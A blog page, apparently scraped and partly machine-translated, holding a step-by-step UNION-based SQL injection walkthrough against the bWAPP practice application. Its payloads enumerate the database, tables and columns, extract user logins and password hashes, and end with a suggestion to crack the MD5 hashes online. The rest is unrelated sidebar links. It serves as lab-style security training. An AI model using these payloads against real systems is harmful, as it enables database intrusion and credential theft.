当前位置:网站首页>SQL Injection (GET/Search)
SQL Injection (GET/Search)
2022-07-03 13:37:00 【this is hhhhp】
1. Determine the injection point
Input ' Tips : near '%'' at line 1
1111' or 1=1 #No abnormality
2. Determine the number of fields
' order by 10 #
' order by 7 #7 A field
3. Determine the displayable fields :
-1' union select 1,2,3,4,5,6,7 # 2,3,4,5 Is a displayable field 
4. Blast storage :
-1' union select 1,database(),3,4,5,6,7 #Library name :bWAPP
5. Explosion meter :
-1' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#altogether 5 A watch , Obviously we need to use users
6. Pop field name
-1' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'#altogether 9 A field , We need to login,admin,password
7. Pop field content
-1' union select 1,login,password,4,admin,6,7 from bWAPP.users#Two in all
8.md5 Decrypt md5 Online decryption ,md5 Decryption encryption
A.I.M. bug
bee bug
边栏推荐
- [today in history] July 3: ergonomic standards act; The birth of pioneers in the field of consumer electronics; Ubisoft releases uplay
- Flink SQL knows why (7): haven't you even seen the ETL and group AGG scenarios that are most suitable for Flink SQL?
- 常见的几种最优化方法Matlab原理和深度分析
- 全面发展数字经济主航道 和数集团积极推动UTONMOS数藏市场
- Unity render streaming communicates with unity through JS
- Unity Render Streaming通过Js与Unity自定义通讯
- Kivy tutorial how to automatically load kV files
- JSON serialization case summary
- 父亲和篮球
- 静态链表(数组的下标代替指针)
猜你喜欢
stm32和电机开发(从mcu到架构设计)
MySQL_ JDBC
This math book, which has been written by senior ml researchers for 7 years, is available in free electronic version
掌握Cypress命令行选项,是真正掌握Cypress的基础
Flick SQL knows why (10): everyone uses accumulate window to calculate cumulative indicators
Bidirectional linked list (we only need to pay attention to insert and delete functions)
Mycms we media mall v3.4.1 release, user manual update
DQL basic query
这本数学书AI圈都在转,资深ML研究员历时7年之作,免费电子版可看
Flutter dynamic | fair 2.5.0 new version features
随机推荐
STM32 and motor development (from MCU to architecture design)
Swiftui development experience: the five most powerful principles that a programmer needs to master
双链笔记 RemNote 综合评测:快速输入、PDF 阅读、间隔重复/记忆
PowerPoint 教程,如何在 PowerPoint 中将演示文稿另存为视频?
stm32和电机开发(从mcu到架构设计)
Flink SQL knows why (17): Zeppelin, a sharp tool for developing Flink SQL
今日睡眠质量记录77分
HALCON联合C#检测表面缺陷——HALCON例程autobahn
开始报名丨CCF C³[email protected]奇安信:透视俄乌网络战 —— 网络空间基础设施面临的安全对抗与制裁博弈...
File uploading and email sending
Kivy tutorial how to automatically load kV files
Universal dividend source code, supports the dividend of any B on the BSC
[sort] bucket sort
Kivy教程之 如何通过字符串方式载入kv文件设计界面(教程含源码)
[quantitative trading] permanent portfolio, turtle trading rules reading, back testing and discussion
Setting up remote links to MySQL on Linux
Stack application (balancer)
IBEM mathematical formula detection data set
Kivy tutorial how to load kV file design interface by string (tutorial includes source code)
Mycms we media mall v3.4.1 release, user manual update